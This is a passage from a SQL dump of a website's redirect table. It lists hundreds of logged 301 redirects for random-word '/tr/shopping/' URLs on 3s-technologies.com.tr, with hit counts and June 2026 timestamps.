00:00:00',301),(68494,'http://3s-technologies.com.tr/tr/shopping/appanagist/3534720046.html',NULL,'','',1,0,'2026-06-11 00:17:37','0000-00-00 00:00:00',301),(68495,'https://3s-technologies.com.tr/tr/shopping/dioecia/3203087745.html',NULL,'https://3s-technologies.com.tr/shopping/dioecia/3203087745.html','',1,0,'2026-06-11 00:17:39','0000-00-00 00:00:00',301),(68496,'http://3s-technologies.com.tr/tr/shopping/submergible/611773430.html',NULL,'','',2,0,'2026-06-11 00:17:40','0000-00-00 00:00:00',301),(68497,'https://3s-technologies.com.tr/tr/shopping/flashily/3912349958.html',NULL,'https://3s-technologies.com.tr/shopping/flashily/3912349958.html','',1,0,'2026-06-11 00:17:42','0000-00-00 00:00:00',301),(68498,'https://3s-technologies.com.tr/tr/shopping/selfsufficingness/798622222.html',NULL,'https://3s-technologies.com.tr/shopping/selfsufficingness/798622222.html','',1,0,'2026-06-11 00:17:45','0000-00-00 00:00:00',301),(68499,'http://3s-technologies.com.tr/tr/shopping/camboose/1726674798.html',NULL,'','',2,0,'2026-06-11 00:17:46','0000-00-00 00:00:00',301),(68500,'https://3s-technologies.com.tr/tr/shopping/cippi/3639692625.html',NULL,'https://3s-technologies.com.tr/shopping/cippi/3639692625.html','',1,0,'2026-06-11 00:17:48','0000-00-00 00:00:00',301),(68501,'http://3s-technologies.com.tr/tr/shopping/gelation/3128122089.html',NULL,'','',2,0,'2026-06-11 00:17:50','0000-00-00 00:00:00',301),(68502,'https://3s-technologies.com.tr/tr/shopping/perfectness/582364758.html',NULL,'https://3s-technologies.com.tr/shopping/perfectness/582364758.html','',1,0,'2026-06-11 00:17:51','0000-00-00 00:00:00',301),(68503,'https://3s-technologies.com.tr/tr/shopping/verteber/2497112447.html',NULL,'https://3s-technologies.com.tr/shopping/verteber/2497112447.html','',1,0,'2026-06-11 00:17:54','0000-00-00 00:00:00',301),(68504,'http://3s-technologies.com.tr/tr/shopping/burgundy/4291843072.html',NULL,'','',1,0,'2026-06-11 00:17:54','0000-00-00 00:00:00',301),(68505,'http://3s-technologies.com.tr/tr/shopping/coquette/434692739.html',NULL,'','',1,0,'2026-06-11 00:17:56','0000-00-00 00:00:00',301),(68506,'https://3s-technologies.com.tr/tr/shopping/scioptric/1778353355.html',NULL,'https://3s-technologies.com.tr/shopping/scioptric/1778353355.html','',1,0,'2026-06-11 00:17:57','0000-00-00 00:00:00',301),(68507,'https://3s-technologies.com.tr/tr/shopping/prebend/3299409021.html',NULL,'https://3s-technologies.com.tr/shopping/prebend/3299409021.html','',1,0,'2026-06-11 00:18:03','0000-00-00 00:00:00',301),(68508,'https://3s-technologies.com.tr/tr/shopping/absinthian/3004530677.html',NULL,'https://3s-technologies.com.tr/shopping/absinthian/3004530677.html','',1,0,'2026-06-11 00:18:06','0000-00-00 00:00:00',301),(68509,'https://3s-technologies.com.tr/tr/shopping/catawbas/1793447718.html',NULL,'https://3s-technologies.com.tr/shopping/catawbas/1793447718.html','',1,0,'2026-06-11 00:18:09','0000-00-00 00:00:00',301),(68510,'https://3s-technologies.com.tr/tr/shopping/conventionality/1328261431.html',NULL,'https://3s-technologies.com.tr/shopping/conventionality/1328261431.html','',1,0,'2026-06-11 00:18:12','0000-00-00 00:00:00',301),(68511,'https://3s-technologies.com.tr/tr/shopping/resuscitated/3841486682.html',NULL,'https://3s-technologies.com.tr/shopping/resuscitated/3841486682.html','',1,0,'2026-06-11 00:18:15','0000-00-00 00:00:00',301),(68512,'https://3s-technologies.com.tr/tr/shopping/selfhardened/2346751748.html',NULL,'https://3s-technologies.com.tr/shopping/selfhardened/2346751748.html','',1,0,'2026-06-11 00:18:18','0000-00-00 00:00:00',301),(68513,'https://3s-technologies.com.tr/tr/shopping/silvate/3980852740.html',NULL,'https://3s-technologies.com.tr/shopping/silvate/3980852740.html','',1,0,'2026-06-11 00:18:21','0000-00-00 00:00:00',301),(68514,'https://3s-technologies.com.tr/tr/shopping/samian/880480123.html',NULL,'https://3s-technologies.com.tr/shopping/samian/880480123.html','',1,0,'2026-06-11 00:18:24','0000-00-00 00:00:00',301),(68515,'https://3s-technologies.com.tr/tr/shopping/crabby/3204299828.html',NULL,'https://3s-technologies.com.tr/shopping/crabby/3204299828.html','',1,0,'2026-06-11 00:18:27','0000-00-00 00:00:00',301),(68516,'https://3s-technologies.com.tr/tr/shopping/corfiote/3609849193.html',NULL,'https://3s-technologies.com.tr/shopping/corfiote/3609849193.html','',1,0,'2026-06-11 00:18:30','0000-00-00 00:00:00',301),(68517,'https://3s-technologies.com.tr/tr/shopping/saltly/3912186435.html',NULL,'https://3s-technologies.com.tr/shopping/saltly/3912186435.html','',1,0,'2026-06-11 00:18:33','0000-00-00 00:00:00',301),(68518,'https://3s-technologies.com.tr/tr/shopping/cirripedia/757602346.html',NULL,'https://3s-technologies.com.tr/shopping/cirripedia/757602346.html','',1,0,'2026-06-11 00:18:51','0000-00-00 00:00:00',301),(68519,'https://3s-technologies.com.tr/tr/shopping/archtraitor/3732726954.html',NULL,'https://3s-technologies.com.tr/shopping/archtraitor/3732726954.html','',1,0,'2026-06-11 00:18:54','0000-00-00 00:00:00',301),(68520,'https://3s-technologies.com.tr/tr/shopping/dunnage/843396494.html',NULL,'https://3s-technologies.com.tr/shopping/dunnage/843396494.html','',1,0,'2026-06-11 00:18:57','0000-00-00 00:00:00',301),(68521,'https://3s-technologies.com.tr/tr/shopping/annalist/2917524462.html',NULL,'https://3s-technologies.com.tr/shopping/annalist/2917524462.html','',1,0,'2026-06-11 00:19:00','0000-00-00 00:00:00',301),(68522,'https://3s-technologies.com.tr/tr/shopping/manacle/1597681775.html',NULL,'https://3s-technologies.com.tr/shopping/manacle/1597681775.html','',1,0,'2026-06-11 00:19:03','0000-00-00 00:00:00',301),(68523,'https://3s-technologies.com.tr/tr/shopping/quittance/2891435458.html',NULL,'https://3s-technologies.com.tr/shopping/quittance/2891435458.html','',1,0,'2026-06-11 00:19:06','0000-00-00 00:00:00',301),(68524,'https://3s-technologies.com.tr/tr/shopping/treenail/3488183547.html',NULL,'https://3s-technologies.com.tr/shopping/treenail/3488183547.html','',1,0,'2026-06-11 00:19:09','0000-00-00 00:00:00',301),(68525,'https://3s-technologies.com.tr/tr/shopping/overshooting/2646079212.html',NULL,'https://3s-technologies.com.tr/shopping/overshooting/2646079212.html','',1,0,'2026-06-11 00:19:12','0000-00-00 00:00:00',301),(68526,'https://3s-technologies.com.tr/tr/shopping/microcosmography/117178471.html',NULL,'https://3s-technologies.com.tr/shopping/microcosmography/117178471.html','',1,0,'2026-06-11 00:19:15','0000-00-00 00:00:00',301),(68527,'https://3s-technologies.com.tr/tr/shopping/belligerent/1992004786.html',NULL,'https://3s-technologies.com.tr/shopping/belligerent/1992004786.html','',1,0,'2026-06-11 00:19:18','0000-00-00 00:00:00',301),(68528,'https://3s-technologies.com.tr/tr/shopping/colley/3152285359.html',NULL,'https://3s-technologies.com.tr/shopping/colley/3152285359.html','',1,0,'2026-06-11 00:19:21','0000-00-00 00:00:00',301),(68529,'https://3s-technologies.com.tr/tr/shopping/roseine/3211285089.html',NULL,'https://3s-technologies.com.tr/shopping/roseine/3211285089.html','',1,0,'2026-06-11 00:19:25','0000-00-00 00:00:00',301),(68530,'https://3s-technologies.com.tr/tr/shopping/exported/4244146721.html',NULL,'https://3s-technologies.com.tr/shopping/exported/4244146721.html','',1,0,'2026-06-11 00:19:27','0000-00-00 00:00:00',301),(68531,'https://3s-technologies.com.tr/tr/shopping/townlet/4292505027.html',NULL,'https://3s-technologies.com.tr/shopping/townlet/4292505027.html','',1,0,'2026-06-11 00:19:30','0000-00-00 00:00:00',301),(68532,'https://3s-technologies.com.tr/tr/shopping/hedera/698085876.html',NULL,'https://3s-technologies.com.tr/shopping/hedera/698085876.html','',1,0,'2026-06-11 00:19:33','0000-00-00 00:00:00',301),(68533,'https://3s-technologies.com.tr/tr/shopping/roseo/2150475237.html',NULL,'https://3s-technologies.com.tr/shopping/roseo/2150475237.html','',1,0,'2026-06-11 00:19:36','0000-00-00 00:00:00',301),(68534,'https://3s-technologies.com.tr/tr/shopping/mistide/1250157942.html',NULL,'https://3s-technologies.com.tr/shopping/mistide/1250157942.html','',1,0,'2026-06-11 00:19:39','0000-00-00 00:00:00',301),(68535,'https://3s-technologies.com.tr/tr/shopping/melanic/1939990301.html',NULL,'https://3s-technologies.com.tr/shopping/melanic/1939990301.html','',1,0,'2026-06-11 00:19:42','0000-00-00 00:00:00',301),(68536,'https://3s-technologies.com.tr/tr/shopping/domesmen/4034015620.html',NULL,'https://3s-technologies.com.tr/shopping/domesmen/4034015620.html','',1,0,'2026-06-11 00:19:45','0000-00-00 00:00:00',301),(68537,'https://3s-technologies.com.tr/tr/shopping/apportionment/3790520773.html',NULL,'https://3s-technologies.com.tr/shopping/apportionment/3790520773.html','',1,0,'2026-06-11 00:19:48','0000-00-00 00:00:00',301),(68538,'https://3s-technologies.com.tr/tr/shopping/hetaera/4144750361.html',NULL,'https://3s-technologies.com.tr/shopping/hetaera/4144750361.html','',1,0,'2026-06-11 00:19:51','0000-00-00 00:00:00',301),(68539,'http://3s-technologies.com.tr/tr/shopping/nipplewort/3150411273.html',NULL,'','',2,0,'2026-06-11 00:19:52','0000-00-00 00:00:00',301),(68540,'https://3s-technologies.com.tr/tr/shopping/overloaded/2539344390.html',NULL,'https://3s-technologies.com.tr/shopping/overloaded/2539344390.html','',1,0,'2026-06-11 00:19:54','0000-00-00 00:00:00',301),(68541,'https://3s-technologies.com.tr/tr/shopping/septiform/2724395214.html',NULL,'https://3s-technologies.com.tr/shopping/septiform/2724395214.html','',1,0,'2026-06-11 00:20:00','0000-00-00 00:00:00',301),(68542,'https://3s-technologies.com.tr/tr/shopping/ultrage/1391786245.html',NULL,'https://3s-technologies.com.tr/shopping/ultrage/1391786245.html','',1,0,'2026-06-11 00:20:03','0000-00-00 00:00:00',301),(68543,'https://3s-technologies.com.tr/tr/shopping/obnubilation/2692552930.html',NULL,'https://3s-technologies.com.tr/shopping/obnubilation/2692552930.html','',1,0,'2026-06-11 00:20:06','0000-00-00 00:00:00',301),(68544,'https://3s-technologies.com.tr/tr/shopping/impracticableness/634724585.html',NULL,'https://3s-technologies.com.tr/shopping/impracticableness/634724585.html','',1,0,'2026-06-11 00:20:09','0000-00-00 00:00:00',301),(68545,'https://3s-technologies.com.tr/tr/shopping/bisulcous/1476016113.html',NULL,'https://3s-technologies.com.tr/shopping/bisulcous/1476016113.html','',1,0,'2026-06-11 00:20:12','0000-00-00 00:00:00',301),(68546,'https://3s-technologies.com.tr/tr/shopping/toged/53073229.html',NULL,'https://3s-technologies.com.tr/shopping/toged/53073229.html','',1,0,'2026-06-11 00:20:15','0000-00-00 00:00:00',301),(68547,'http://3s-technologies.com.tr/tr/shopping/ragweed/3251321337.html',NULL,'','',2,0,'2026-06-11 00:20:15','0000-00-00 00:00:00',301),(68548,'https://3s-technologies.com.tr/tr/shopping/invenom/1349554302.html',NULL,'https://3s-technologies.com.tr/shopping/invenom/1349554302.html','',1,0,'2026-06-11 00:20:18','0000-00-00 00:00:00',301),(68549,'https://3s-technologies.com.tr/tr/shopping/redargutory/2840469549.html',NULL,'https://3s-technologies.com.tr/shopping/redargutory/2840469549.html','',1,0,'2026-06-11 00:20:21','0000-00-00 00:00:00',301),(68550,'https://3s-technologies.com.tr/tr/shopping/obtusata/930909426.html',NULL,'https://3s-technologies.com.tr/shopping/obtusata/930909426.html','',1,0,'2026-06-11 00:20:24','0000-00-00 00:00:00',301),(68551,'https://3s-technologies.com.tr/tr/shopping/clumber/3698692339.html',NULL,'https://3s-technologies.com.tr/shopping/clumber/3698692339.html','',1,0,'2026-06-11 00:20:27','0000-00-00 00:00:00',301),(68552,'https://3s-technologies.com.tr/tr/shopping/hectorism/3221305532.html',NULL,'https://3s-technologies.com.tr/shopping/hectorism/3221305532.html','',1,0,'2026-06-11 00:20:30','0000-00-00 00:00:00',301),(68553,'http://3s-technologies.com.tr/tr/shopping/sigillated/1351478482.html',NULL,'','',2,0,'2026-06-11 00:20:31','0000-00-00 00:00:00',301),(68554,'https://3s-technologies.com.tr/tr/shopping/symphonies/1690714433.html',NULL,'https://3s-technologies.com.tr/shopping/symphonies/1690714433.html','',1,0,'2026-06-11 00:20:38','0000-00-00 00:00:00',301),(68555,'https://3s-technologies.com.tr/tr/shopping/associative/1397912624.html',NULL,'https://3s-technologies.com.tr/shopping/associative/1397912624.html','',1,0,'2026-06-11 00:20:42','0000-00-00 00:00:00',301),(68556,'https://3s-technologies.com.tr/tr/shopping/enjoy/379422306.html',NULL,'https://3s-technologies.com.tr/shopping/enjoy/379422306.html','',1,0,'2026-06-11 00:20:45','0000-00-00 00:00:00',301),(68557,'https://3s-technologies.com.tr/tr/shopping/hissed/4052764608.html',NULL,'https://3s-technologies.com.tr/shopping/hissed/4052764608.html','',1,0,'2026-06-11 00:20:48','0000-00-00 00:00:00',301),(68558,'http://3s-technologies.com.tr/tr/shopping/cibarious/1426109197.html',NULL,'','',1,0,'2026-06-11 00:20:48','0000-00-00 00:00:00',301),(68559,'https://3s-technologies.com.tr/tr/shopping/pedlar/3764595308.html',NULL,'https://3s-technologies.com.tr/shopping/pedlar/3764595308.html','',1,0,'2026-06-11 00:20:51','0000-00-00 00:00:00',301),(68560,'https://3s-technologies.com.tr/tr/shopping/stilted/3491937943.html',NULL,'https://3s-technologies.com.tr/shopping/stilted/3491937943.html','',1,0,'2026-06-11 00:20:54','0000-00-00 00:00:00',301),(68561,'https://3s-technologies.com.tr/tr/shopping/consistory/257756628.html',NULL,'https://3s-technologies.com.tr/shopping/consistory/257756628.html','',1,0,'2026-06-11 00:20:57','0000-00-00 00:00:00',301),(68562,'http://3s-technologies.com.tr/tr/shopping/barquentine/1742210604.html',NULL,'','',2,0,'2026-06-11 00:21:00','0000-00-00 00:00:00',301),(68563,'https://3s-technologies.com.tr/tr/shopping/kittycornered/2013459578.html',NULL,'https://3s-technologies.com.tr/shopping/kittycornered/2013459578.html','',1,0,'2026-06-11 00:21:00','0000-00-00 00:00:00',301),(68564,'https://3s-technologies.com.tr/tr/shopping/phlomis/1967473207.html',NULL,'https://3s-technologies.com.tr/shopping/phlomis/1967473207.html','',1,0,'2026-06-11 00:21:03','0000-00-00 00:00:00',301),(68565,'https://3s-technologies.com.tr/tr/shopping/carbamide/2223977655.html',NULL,'https://3s-technologies.com.tr/shopping/carbamide/2223977655.html','',1,0,'2026-06-11 00:21:06','0000-00-00 00:00:00',301),(68566,'https://3s-technologies.com.tr/tr/shopping/petitor/1792061383.html',NULL,'https://3s-technologies.com.tr/shopping/petitor/1792061383.html','',1,0,'2026-06-11 00:21:09','0000-00-00 00:00:00',301),(68567,'http://3s-technologies.com.tr/tr/shopping/pythiad/1624135815.html',NULL,'','',1,0,'2026-06-11 00:21:11','0000-00-00 00:00:00',301),(68568,'https://3s-technologies.com.tr/tr/shopping/misfall/3248443096.html',NULL,'https://3s-technologies.com.tr/shopping/misfall/3248443096.html','',1,0,'2026-06-11 00:21:15','0000-00-00 00:00:00',301),(68569,'https://3s-technologies.com.tr/tr/shopping/necklaced/2428446142.html',NULL,'https://3s-technologies.com.tr/shopping/necklaced/2428446142.html','',1,0,'2026-06-11 00:21:18','0000-00-00 00:00:00',301),(68570,'https://3s-technologies.com.tr/tr/shopping/monodora/3804403069.html',NULL,'https://3s-technologies.com.tr/shopping/monodora/3804403069.html','',1,0,'2026-06-11 00:21:21','0000-00-00 00:00:00',301),(68571,'https://3s-technologies.com.tr/tr/shopping/alcazar/2662222151.html',NULL,'https://3s-technologies.com.tr/shopping/alcazar/2662222151.html','',1,0,'2026-06-11 00:21:24','0000-00-00 00:00:00',301),(68572,'https://3s-technologies.com.tr/tr/shopping/morelia/3750427350.html',NULL,'https://3s-technologies.com.tr/shopping/morelia/3750427350.html','',1,0,'2026-06-11 00:21:27','0000-00-00 00:00:00',301),(68573,'https://3s-technologies.com.tr/tr/shopping/parotia/1433784138.html',NULL,'https://3s-technologies.com.tr/shopping/parotia/1433784138.html','',1,0,'2026-06-11 00:21:30','0000-00-00 00:00:00',301),(68574,'https://3s-technologies.com.tr/tr/shopping/neptune/2810789640.html',NULL,'https://3s-technologies.com.tr/shopping/neptune/2810789640.html','',1,0,'2026-06-11 00:21:33','0000-00-00 00:00:00',301),(68575,'https://3s-technologies.com.tr/tr/shopping/mimeograph/3179768265.html',NULL,'https://3s-technologies.com.tr/shopping/mimeograph/3179768265.html','',1,0,'2026-06-11 00:21:36','0000-00-00 00:00:00',301),(68576,'https://3s-technologies.com.tr/tr/shopping/appraisal/188041747.html',NULL,'https://3s-technologies.com.tr/shopping/appraisal/188041747.html','',1,0,'2026-06-11 00:21:39','0000-00-00 00:00:00',301),(68577,'https://3s-technologies.com.tr/tr/shopping/cranioclasm/2159189321.html',NULL,'https://3s-technologies.com.tr/shopping/cranioclasm/2159189321.html','',1,0,'2026-06-11 00:21:42','0000-00-00 00:00:00',301),(68578,'https://3s-technologies.com.tr/tr/shopping/holey/3708195407.html',NULL,'https://3s-technologies.com.tr/shopping/holey/3708195407.html','',1,0,'2026-06-11 00:21:45','0000-00-00 00:00:00',301),(68579,'https://3s-technologies.com.tr/tr/shopping/almonries/3953369818.html',NULL,'https://3s-technologies.com.tr/shopping/almonries/3953369818.html','',1,0,'2026-06-11 00:21:51','0000-00-00 00:00:00',301),(68580,'https://3s-technologies.com.tr/tr/shopping/seventeenth/1900019001.html',NULL,'https://3s-technologies.com.tr/shopping/seventeenth/1900019001.html','',1,0,'2026-06-11 00:21:53','0000-00-00 00:00:00',301),(68581,'https://3s-technologies.com.tr/tr/shopping/blastocerus/1441981482.html',NULL,'https://3s-technologies.com.tr/shopping/blastocerus/1441981482.html','',1,0,'2026-06-11 00:21:56','0000-00-00 00:00:00',301),(68582,'https://3s-technologies.com.tr/tr/shopping/abodement/3491774420.html',NULL,'https://3s-technologies.com.tr/shopping/abodement/3491774420.html','',1,0,'2026-06-11 00:21:59','0000-00-00 00:00:00',301),(68583,'https://3s-technologies.com.tr/tr/shopping/jument/773745301.html',NULL,'https://3s-technologies.com.tr/shopping/jument/773745301.html','',1,0,'2026-06-11 00:22:02','0000-00-00 00:00:00',301),(68584,'https://3s-technologies.com.tr/tr/shopping/antecommunion/2420221057.html',NULL,'https://3s-technologies.com.tr/shopping/antecommunion/2420221057.html','',1,0,'2026-06-11 00:22:10','0000-00-00 00:00:00',301),(68585,'https://3s-technologies.com.tr/tr/shopping/photolithograph/581152659.html',NULL,'https://3s-technologies.com.tr/shopping/photolithograph/581152659.html','',1,0,'2026-06-11 00:22:12','0000-00-00 00:00:00',301),(68586,'https://3s-technologies.com.tr/tr/shopping/colegoose/334584314.html',NULL,'https://3s-technologies.com.tr/shopping/colegoose/334584314.html','',1,0,'2026-06-11 00:22:15','0000-00-00 00:00:00',301),(68587,'https://3s-technologies.com.tr/tr/shopping/liechtensteiner/1670569957.html',NULL,'https://3s-technologies.com.tr/shopping/liechtensteiner/1670569957.html','',1,0,'2026-06-11 00:22:18','0000-00-00 00:00:00',301),(68588,'https://3s-technologies.com.tr/tr/shopping/photoengrave/1069254633.html',NULL,'https://3s-technologies.com.tr/shopping/photoengrave/1069254633.html','',1,0,'2026-06-11 00:22:21','0000-00-00 00:00:00',301),(68589,'https://3s-technologies.com.tr/tr/shopping/quarte/4059941117.html',NULL,'https://3s-technologies.com.tr/shopping/quarte/4059941117.html','',1,0,'2026-06-11 00:22:24','0000-00-00 00:00:00',301),(68590,'https://3s-technologies.com.tr/tr/shopping/earthquave/408053607.html',NULL,'https://3s-technologies.com.tr/shopping/earthquave/408053607.html','',1,0,'2026-06-11 00:22:26','0000-00-00 00:00:00',301),(68591,'https://3s-technologies.com.tr/tr/shopping/insurgent/486157096.html',NULL,'https://3s-technologies.com.tr/shopping/insurgent/486157096.html','',1,0,'2026-06-11 00:22:30','0000-00-00 00:00:00',301),(68592,'https://3s-technologies.com.tr/tr/shopping/reflueus/1068042534.html',NULL,'https://3s-technologies.com.tr/shopping/reflueus/1068042534.html','',1,0,'2026-06-11 00:22:33','0000-00-00 00:00:00',301),(68593,'https://3s-technologies.com.tr/tr/shopping/brutal/1519578286.html',NULL,'https://3s-technologies.com.tr/shopping/brutal/1519578286.html','',1,0,'2026-06-11 00:22:35','0000-00-00 00:00:00',301),(68594,'https://3s-technologies.com.tr/tr/shopping/monadelphian/2619990208.html',NULL,'https://3s-technologies.com.tr/shopping/monadelphian/2619990208.html','',1,0,'2026-06-11 00:22:43','0000-00-00 00:00:00',301),(68595,'https://3s-technologies.com.tr/tr/shopping/trachoma/3003318594.html',NULL,'https://3s-technologies.com.tr/shopping/trachoma/3003318594.html','',1,0,'2026-06-11 00:22:48','0000-00-00 00:00:00',301),(68596,'https://3s-technologies.com.tr/tr/shopping/symmetric/2351282687.html',NULL,'https://3s-technologies.com.tr/shopping/symmetric/2351282687.html','',1,0,'2026-06-11 00:22:54','0000-00-00 00:00:00',301),(68597,'https://3s-technologies.com.tr/tr/shopping/tyrannus/2062205247.html',NULL,'https://3s-technologies.com.tr/shopping/tyrannus/2062205247.html','',1,0,'2026-06-11 00:22:57','0000-00-00 00:00:00',301),(68598,'https://3s-technologies.com.tr/tr/shopping/melanosporum/1784655919.html',NULL,'https://3s-technologies.com.tr/shopping/melanosporum/1784655919.html','',1,0,'2026-06-11 00:23:00','0000-00-00 00:00:00',301),(68599,'https://3s-technologies.com.tr/tr/shopping/betrimmed/4151427578.html',NULL,'https://3s-technologies.com.tr/shopping/betrimmed/4151427578.html','',1,0,'2026-06-11 00:23:03','0000-00-00 00:00:00',301),(68600,'https://3s-technologies.com.tr/tr/shopping/synecphonesis/1495855615.html',NULL,'https://3s-technologies.com.tr/shopping/synecphonesis/1495855615.html','',1,0,'2026-06-11 00:23:06','0000-00-00 00:00:00',301),(68601,'https://3s-technologies.com.tr/tr/shopping/myrmeleontidae/2874073216.html',NULL,'https://3s-technologies.com.tr/shopping/myrmeleontidae/2874073216.html','',1,0,'2026-06-11 00:23:09','0000-00-00 00:00:00',301),(68602,'https://3s-technologies.com.tr/tr/shopping/sandalwood/3639529102.html',NULL,'https://3s-technologies.com.tr/shopping/sandalwood/3639529102.html','',1,0,'2026-06-11 00:23:12','0000-00-00 00:00:00',301),(68603,'http://3s-technologies.com.tr/tr/shopping/hyporhachis/1951438953.html',NULL,'','',2,0,'2026-06-11 00:23:15','0000-00-00 00:00:00',301),(68604,'https://3s-technologies.com.tr/tr/shopping/incompressibleness/2159025798.html',NULL,'https://3s-technologies.com.tr/shopping/incompressibleness/2159025798.html','',1,0,'2026-06-11 00:23:15','0000-00-00 00:00:00',301),(68605,'https://3s-technologies.com.tr/tr/shopping/twinlikeness/1629386590.html',NULL,'https://3s-technologies.com.tr/shopping/twinlikeness/1629386590.html','',1,0,'2026-06-11 00:23:18','0000-00-00 00:00:00',301),(68606,'https://3s-technologies.com.tr/tr/shopping/tubman/3263537475.html',NULL,'https://3s-technologies.com.tr/shopping/tubman/3263537475.html','',1,0,'2026-06-11 00:23:21','0000-00-00 00:00:00',301),(68607,'https://3s-technologies.com.tr/tr/shopping/duteously/3356901065.html',NULL,'https://3s-technologies.com.tr/shopping/duteously/3356901065.html','',1,0,'2026-06-11 00:23:28','0000-00-00 00:00:00',301),(68608,'https://3s-technologies.com.tr/tr/shopping/devaporation/477914943.html',NULL,'https://3s-technologies.com.tr/shopping/devaporation/477914943.html','',1,0,'2026-06-11 00:23:33','0000-00-00 00:00:00',301),(68609,'https://3s-technologies.com.tr/tr/shopping/forfeitable/4223742653.html',NULL,'https://3s-technologies.com.tr/shopping/forfeitable/4223742653.html','',1,0,'2026-06-11 00:23:36','0000-00-00 00:00:00',301),(68610,'https://3s-technologies.com.tr/tr/shopping/paroled/326342161.html',NULL,'https://3s-technologies.com.tr/shopping/paroled/326342161.html','',1,0,'2026-06-11 00:23:39','0000-00-00 00:00:00',301),(68611,'http://3s-technologies.com.tr/tr/shopping/regeneratory/4216163765.html',NULL,'','',2,0,'2026-06-11 00:23:41','0000-00-00 00:00:00',301),(68612,'https://3s-technologies.com.tr/tr/shopping/orient/4136508208.html',NULL,'https://3s-technologies.com.tr/shopping/orient/4136508208.html','',1,0,'2026-06-11 00:23:42','0000-00-00 00:00:00',301),(68613,'https://3s-technologies.com.tr/tr/shopping/separate/1257334451.html',NULL,'https://3s-technologies.com.tr/shopping/separate/1257334451.html','',1,0,'2026-06-11 00:23:45','0000-00-00 00:00:00',301),(68614,'https://3s-technologies.com.tr/tr/shopping/rustling/2867329209.html',NULL,'https://3s-technologies.com.tr/shopping/rustling/2867329209.html','',1,0,'2026-06-11 00:23:48','0000-00-00 00:00:00',301),(68615,'https://3s-technologies.com.tr/tr/shopping/herborizing/1448715010.html',NULL,'https://3s-technologies.com.tr/shopping/herborizing/1448715010.html','',1,0,'2026-06-11 00:23:51','0000-00-00 00:00:00',301),(68616,'https://3s-technologies.com.tr/tr/shopping/interpretative/3848403599.html',NULL,'https://3s-technologies.com.tr/shopping/interpretative/3848403599.html','',1,0,'2026-06-11 00:23:54','0000-00-00 00:00:00',301),(68617,'https://3s-technologies.com.tr/tr/shopping/recognition/3537546607.html',NULL,'https://3s-technologies.com.tr/shopping/recognition/3537546607.html','',1,0,'2026-06-11 00:23:57','0000-00-00 00:00:00',301),(68618,'https://3s-technologies.com.tr/tr/shopping/touchdown/689888532.html',NULL,'https://3s-technologies.com.tr/shopping/touchdown/689888532.html','',1,0,'2026-06-11 00:24:00','0000-00-00 00:00:00',301),(68619,'https://3s-technologies.com.tr/tr/shopping/hematic/2502913318.html',NULL,'https://3s-technologies.com.tr/shopping/hematic/2502913318.html','',1,0,'2026-06-11 00:24:03','0000-00-00 00:00:00',301),(68620,'http://3s-technologies.com.tr/tr/shopping/moodishly/1985541912.html',NULL,'','',2,0,'2026-06-11 00:24:09','0000-00-00 00:00:00',301),(68621,'https://3s-technologies.com.tr/tr/shopping/accroachment/53004869.html',NULL,'https://3s-technologies.com.tr/shopping/accroachment/53004869.html','',1,0,'2026-06-11 00:24:13','0000-00-00 00:00:00',301),(68622,'https://3s-technologies.com.tr/tr/shopping/alienage/3379613380.html',NULL,'https://3s-technologies.com.tr/shopping/alienage/3379613380.html','',1,0,'2026-06-11 00:24:15','0000-00-00 00:00:00',301),(68623,'https://3s-technologies.com.tr/tr/shopping/minuted/2299490802.html',NULL,'https://3s-technologies.com.tr/shopping/minuted/2299490802.html','',1,0,'2026-06-11 00:24:18','0000-00-00 00:00:00',301),(68624,'https://3s-technologies.com.tr/tr/shopping/divinify/4077200070.html',NULL,'https://3s-technologies.com.tr/shopping/divinify/4077200070.html','',1,0,'2026-06-11 00:24:21','0000-00-00 00:00:00',301),(68625,'https://3s-technologies.com.tr/tr/shopping/proceeds/3946339748.html',NULL,'https://3s-technologies.com.tr/shopping/proceeds/3946339748.html','',1,0,'2026-06-11 00:24:24','0000-00-00 00:00:00',301),(68626,'https://3s-technologies.com.tr/tr/shopping/selfdetermination/480079533.html',NULL,'https://3s-technologies.com.tr/shopping/selfdetermination/480079533.html','',1,0,'2026-06-11 00:24:27','0000-00-00 00:00:00',301),(68627,'https://3s-technologies.com.tr/tr/shopping/increase/2952844466.html',NULL,'https://3s-technologies.com.tr/shopping/increase/2952844466.html','',1,0,'2026-06-11 00:24:30','0000-00-00 00:00:00',301),(68628,'https://3s-technologies.com.tr/tr/shopping/tabarder/2013228294.html',NULL,'https://3s-technologies.com.tr/shopping/tabarder/2013228294.html','',1,0,'2026-06-11 00:24:33','0000-00-00 00:00:00',301),(68629,'https://3s-technologies.com.tr/tr/shopping/utterly/2133681873.html',NULL,'https://3s-technologies.com.tr/shopping/utterly/2133681873.html','',1,0,'2026-06-11 00:24:36','0000-00-00 00:00:00',301),(68630,'https://3s-technologies.com.tr/tr/shopping/avouched/970142709.html',NULL,'https://3s-technologies.com.tr/shopping/avouched/970142709.html','',1,0,'2026-06-11 00:24:39','0000-00-00 00:00:00',301),(68631,'https://3s-technologies.com.tr/tr/shopping/overmultiply/3464405556.html',NULL,'https://3s-technologies.com.tr/shopping/overmultiply/3464405556.html','',1,0,'2026-06-11 00:24:42','0000-00-00 00:00:00',301),(68632,'https://3s-technologies.com.tr/tr/shopping/obsessed/2995076409.html',NULL,'https://3s-technologies.com.tr/shopping/obsessed/2995076409.html','',1,0,'2026-06-11 00:24:45','0000-00-00 00:00:00',301),(68633,'https://3s-technologies.com.tr/tr/shopping/thriver/1231573705.html',NULL,'https://3s-technologies.com.tr/shopping/thriver/1231573705.html','',1,0,'2026-06-11 00:24:48','0000-00-00 00:00:00',301),(68634,'https://3s-technologies.com.tr/tr/shopping/fuscation/790380037.html',NULL,'https://3s-technologies.com.tr/shopping/fuscation/790380037.html','',1,0,'2026-06-11 00:24:51','0000-00-00 00:00:00',301),(68635,'https://3s-technologies.com.tr/tr/shopping/suingly/1860884840.html',NULL,'https://3s-technologies.com.tr/shopping/suingly/1860884840.html','',1,0,'2026-06-11 00:24:54','0000-00-00 00:00:00',301),(68636,'https://3s-technologies.com.tr/tr/shopping/sciatical/1443849514.html',NULL,'https://3s-technologies.com.tr/shopping/sciatical/1443849514.html','',1,0,'2026-06-11 00:24:57','0000-00-00 00:00:00',301),(68637,'https://3s-technologies.com.tr/tr/shopping/beaconing/3975198292.html',NULL,'https://3s-technologies.com.tr/shopping/beaconing/3975198292.html','',1,0,'2026-06-11 00:25:00','0000-00-00 00:00:00',301),(68638,'http://3s-technologies.com.tr/tr/shopping/morone/1631312324.html',NULL,'','',1,0,'2026-06-11 00:25:02','0000-00-00 